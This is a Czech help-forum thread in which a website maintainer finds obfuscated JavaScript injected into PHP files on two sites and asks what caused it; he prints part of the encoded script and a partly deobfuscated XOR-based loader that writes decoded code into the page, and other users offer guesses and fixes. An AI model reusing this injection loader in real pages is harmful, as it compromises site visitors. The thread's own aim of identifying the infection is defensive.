» Poradna » Počítačové sítě

Vir? měnící webové stránky

Odpovědět  |  Zobrazit bez stromu  |  Upozornit redakci  |  nových odpovědí: 8/8
 |   |   |  [85.132.224.---]

Dobrý den,

dneska ráno mě nemile překvapila následující věc. Na dvou webech, které občas pomáhám udržovat, byly nepochopitelné chyby. Nevěděl jsem proč, ale následně jsem v HTML kódu (v PHP skriptech) obou z nich objevil následující kód:




Nechápu, jak se tam dostal. V zálohách jsem nic takového neměl, takže oprava byla rychlá, ale děsí mě, že nevím, čím se to stalo. Předpokládám, že chyba bude někde u mě, protože oba dva weby běží na hostingu jiné firmy, takže nepředpokládám, že by se někdo naboural přímo do serverů.

Spíše teda předpokládám, že mám v pc něco, co dokázalo ty skripty změnit prostřednictvím FTP. Nenapadá mě totiž ani nikdo jiný, kdo by kromě mě mohl mít FTP přístup k oběma serverům....

Zkoušel jsem se dívat různě po netu, jestli nenarazím na podobný problém. Našel jsem něco zde: www.webhostingtalk.com ... ale bohužel tam si nikdo nevěděl rady.

Tak se chci zeptat, jestli někdo netušíte, co to může způsobovat? Nebo jestli nevíte, kde bych našel nějaké informace?

Odpovědi na otázku

 |   |   |  [85.132.224.---]

Koukám, že se mi tady ten kód nevložil, snad to teď dopadne lépe:

<!--[z0s]--><script>document.write(unescape("%3Cscript%3Eif%28hzK
.... nepíšu sem celý kód, má přes 4kB ....
h%28JYi%29%7B%7D%7Dvar%20hzK%3D1%3C/script%3E"))</script><!--[/z0s]-->

Souhlasím  |  Nesouhlasím  |  Odpovědět
 |   |   |  [89.29.51.---]

Neni to nejaka reklama hostingove firmy?

Souhlasím  |  Nesouhlasím  |  Odpovědět
 |   |   |  [85.132.224.---]

Tak to nevím, ten skript negeneruje nic viditelného, žádnou reklamu, takže nepředpokládám.

Projel jsem ten kód a vypreparoval z něho toto:

<script>
if(hzK!=1){
function RC(Ef){
return Ef
}
try{
var WD='',Om=WD.substr(2,1);
var ve=Array(dm('187'),7639^7459,dm('228'),3092^3297,29669^29451, dm('247'),dm('243'),dm('185'),23196^23165,22421^22375,5280^5193,dm('232'), 2236^2075,dm('200'),32672^32607,13646^13793,23352^23539,28825^28751, 27546^27441,dm('202'),28885^28729,dm('174'),27683^27871,3948^3997,dm('230'), 15922^16109,14355^14579,16239^16287,16495^16597,dm('226'),dm('195'), 17002^17025,12038^12235,401^301,dm('169'),2458^2377,dm('234'),dm('172'), dm('191'),15898^16043,16248^16331,13830^14001,dm('227'),dm('165'),dm('192'), 12483^12311,19335^19325,dm('215'),18213^18309,dm('182'),dm('221'),6932^7121, 30473^30671,11947^11881,dm('168'),dm('239'),15585^15435,27460^27641, 29683^29525,20303^20471,11427^11391,dm('217'),23676^23681,7883^7797, dm('218'),dm('219'),19761^19919,5026^4935,24503^24323,18986^19103, 13127^13187,dm('141'),8024^8077,19423^19309,dm('176'),8318^8375, 5604^5385,dm('173')),Ho;
var xu,nW;
var yC='',Qx='';
WD=WD.split(Om);
for (Ho=0;Ho<yC.length;Ho+=2){
nW=yC.substr(Ho,2);
for(xu=0;xu<WD.length;xu++){
if(WD[xu]==nW) break;
}
Qx+=String.fromCharCode(ve[xu]^135);
}

function dm(OB){
return parseInt(OB)
}
document.write(Qx);
}
catch(MH){}
}
var hzK=1
</script>

akorát moc mi to teda neříká, co by to jako mělo dělat...

Souhlasím  |  Nesouhlasím  |  Odpovědět
 |   |   |  [88.102.140.---]

Neco k tomu je tady: navody.c4.cz ...

Souhlasím  |  Nesouhlasím  |  Odpovědět
 |   |   |  [85.216.231.---]

jop dnes sa mi stalo presne to iste .. heslo na ftp som mal 39 znakove zlozene z vsetkych moznych znakov ale napriek tomu sa tam ten kod nejako dostal

Souhlasím  |  Nesouhlasím  |  Odpovědět
 |   |   |  [91.127.106.---]

Mal som niečo podobné, obnovil som web zo zálohy ale u všetkých súborov som zmenil atribút len na čítanie a pomohlo to.

Souhlasím  |  Nesouhlasím  |  Odpovědět
 |   |   |  [85.132.221.---]

Zdravím. Asi 3 dny se k tomu nemohu dostat, ale dnes už mne to přinutilo podívat se na ten virusek.. Mám to taky na svých stránkách a odhaduji, že se to tam dostalo přes formulář v diskusním foru. Krátkou dobu se tam někomu daří vkládat nesmyslné odkazy a jsem si jistý, že tímhle se to tam podařilo vpravit až na server do php souborů. Nic, jdu studovat internet, kdyžtak se ještě ozvu, co teda s tím.

Souhlasím  |  Nesouhlasím  |  Odpovědět
 |   |   |  [84.42.248.---]

docela super antivirak a zadara zkoušel jsem ho mužu jen doporučit www.sosej.cz ...

Souhlasím  |  Nesouhlasím  |  Odpovědět



Určitě si přečtěte


Kingdome Come – recenze, mapa a další informace

Kingdome Come – recenze, mapa a další informace

Kingdome Come: Deliverance je unikátní hra z prostředí českého středověku. Zjistěte si všechny informace o této celosvětově úspěšné hře českých tvůrců.

13.  2.  2018 | Vojtěch Malý | 11


Aktuální číslo časopisu Computer

Jak vznikají filmové efekty

Test ATX skříní a externích disků

Znáte svá práva při reklamaci?

Průvodce první instalací NASu